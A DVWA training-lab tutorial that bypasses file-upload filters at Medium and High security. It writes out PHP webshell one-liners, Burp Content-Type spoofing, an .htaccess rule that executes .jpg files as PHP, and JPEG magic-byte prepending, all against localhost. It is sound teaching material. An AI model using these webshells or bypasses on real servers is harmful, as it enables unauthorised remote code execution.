π° Originally published on SecurityElites β the canonical, fully-updated version of this article.
π§ͺ DVWA LAB SERIES
FREE
Part of the DVWA Lab Series β 30 Labs
Lab 18 of 30 Β· 60% complete
β οΈ Local Lab Only: File upload bypass techniques must only be practised against your own DVWA installation. Uploading webshells to any server without written authorisation is a criminal offence.
DVWA File Upload Advanced Lab 2026 :β Lab 6 showed you basic webshell upload at Low security where no filtering exists. Medium and High security add filters that check Content-Type, extension, and image validity. Each filter checks something specific and leaves something else unchecked. Medium trusts the browser-submitted Content-Type but does not look at the actual file. High checks the extension and magic bytes but may still allow .htaccess files that redefine how the server executes uploaded content. Lab 18 bypasses all three levels systematically β read the source, identify the gap, use the exact bypass the gap enables.
π― What Youβll Learn in Lab 18
Bypass Medium security via Content-Type (MIME) spoofing in Burp
Bypass High security using .htaccess upload to redefine PHP execution
Understand double extension bypass and when it applies
Use magic byte injection to pass getimagesize() validation
Execute uploaded webshells and achieve RCE on each security level
β±οΈ 40 min Β· 3 exercises ### β Prerequisites - Lab 6: File Upload basics β Low security webshell upload understood - Lab 14: Security Levels β comfortable reading PHP source - Burp Suite configured with browser proxy ### π DVWA File Upload Advanced Lab 18 Contents β Upload Filter Bypass 1. Medium Security β MIME Spoofing Bypass 2. High Security β .htaccess Upload and Magic Bytes 3. Executing the Webshell After Upload In Lab 6 you uploaded a PHP webshell at Low security. Lab 18 builds directly on that β same goal (PHP execution), different obstacles. The same source code reading methodology from Lab 14 applies: check the filter logic first, identify the gap, apply the specific bypass. The DVWA Lab Series teaches technique recognition, not just exploit execution.
Medium Security β MIME Spoofing Bypass
MEDIUM SECURITY SOURCE + BYPASSCopy
View Source at Medium β the entire upload filter:
if( ( $uploaded_type == βimage/jpegβ || $uploaded_type == βimage/pngβ ) &&
( $uploaded_size < 100000 ) ) {
$uploaded_type = $_FILES[βuploadedβ][βtypeβ] β this is the BROWSER-SUBMITTED Content-Type
Not validated against actual file content
BYPASS: Change Content-Type header in Burp
Step 1: Create webshell
echo β<?php system($_GET[βcmdβ]); ?>β > shell.php
Step 2: Upload shell.php with Burp intercepting
Step 3: In Burp Proxy β intercept the upload request
Original: Content-Type: application/octet-stream
Modified: Content-Type: image/jpeg
Step 4: Forward modified request
succesfully uploaded
Response: //localhost/dvwa/hackable/uploads/shell.php
β‘ EXERCISE 1 β DVWA (12 MIN)
Bypass Medium Security via MIME Spoofing in Burp
β±οΈ Time: 12 minutes Β· DVWA Medium Β· Burp Suite active
MEDIUM BYPASS β COMPLETE STEPSCopy
Step 1: Create minimal PHP webshell
echo β<?php if(isset($_GET[βcmdβ])){ echo β
β; system($_GET[βcmdβ]); echo ββ; } ?>β > /tmp/shell.php
Step 2: Open DVWA File Upload at Medium security
Step 3: Burp Suite: Proxy β Intercept ON
Step 4: Select /tmp/shell.php and click Upload
Step 5: In Burp intercepted request β find the Content-Type line
Content-Disposition: form-data; name=βuploadedβ; filename=βshell.phpβ
Content-Type: application/octet-stream β change this
Content-Type: image/jpeg β to this
Step 6: Forward β request succeeds
succesfully uploaded
Step 7: Navigate to the uploaded file URL
http://localhost/dvwa/hackable/uploads/shell.php?cmd=id
uid=33(www-data) gid=33(www-data)
β What you just learned: The MIME spoofing bypass demonstrates that trusting browser-submitted headers for security decisions is fundamentally broken. The browser submits Content-Type as part of the multipart form data β and that value is trivially modifiable by any proxy. The server never looks at the actual bytes of the uploaded file. Professional web application assessors always test file uploads by modifying the Content-Type in Burp β it is a one-step bypass that works against any application that relies on Content-Type alone. The fix is server-side validation: use PHPβs finfo_file() or getimagesize() to validate the actual file content, not the browser-claimed Content-Type.
πΈ Screenshot the Burp Content-Type modification and the webshell RCE output. Share in #dvwa-labs on Discord.
High Security β .htaccess Upload and Magic Bytes
High security adds two additional checks: getimagesize() which validates that the file has valid image dimensions (checking magic bytes), and an extension whitelist that only accepts .jpg, .jpeg, and .png. The getimagesize() check can be bypassed by prepending valid image magic bytes to the PHP webshell. The extension check can be bypassed by uploading an .htaccess file (if the server accepts it) that redefines how certain extensions are executed.
β‘ EXERCISE 2 β DVWA (15 MIN)
Bypass High Security Using .htaccess Upload
β±οΈ Time: 15 minutes Β· DVWA High security Β· Burp Suite
HIGH BYPASS β .htaccess METHODCopy
Step 1: Create .htaccess that makes .jpg execute as PHP
echo βAddType application/x-httpd-php .jpgβ > /tmp/.htaccess
Step 2: Upload .htaccess via DVWA (with Burp)
.htaccess has no extension β High security checks file extension
Since .htaccess filename doesnβt end in a blocked extension, it may pass
Change Content-Type to image/jpeg in Burp if needed
Step 3: Create webshell with .jpg extension
echo β<?php system($_GET[βcmdβ]); ?>β > /tmp/shell.jpg
Step 4: Add JPEG magic bytes to pass getimagesize()
printf β\xff\xd8\xffβ > /tmp/magic_shell.jpg
cat /tmp/shell.jpg >> /tmp/magic_shell.jpg
File now starts with JPEG magic bytes (passes getimagesize)
AND contains PHP code (executed due to .htaccess rule)
Step 5: Upload magic_shell.jpg
High security checks: extension (.jpg β), getimagesize (β magic bytes)
Upload succeeds!
Step 6: Execute via URL (Apache executes .jpg as PHP due to .htaccess)
http://localhost/dvwa/hackable/uploads/magic_shell.jpg?cmd=id
uid=33(www-data) β PHP executed despite .jpg extension
π Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites β
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)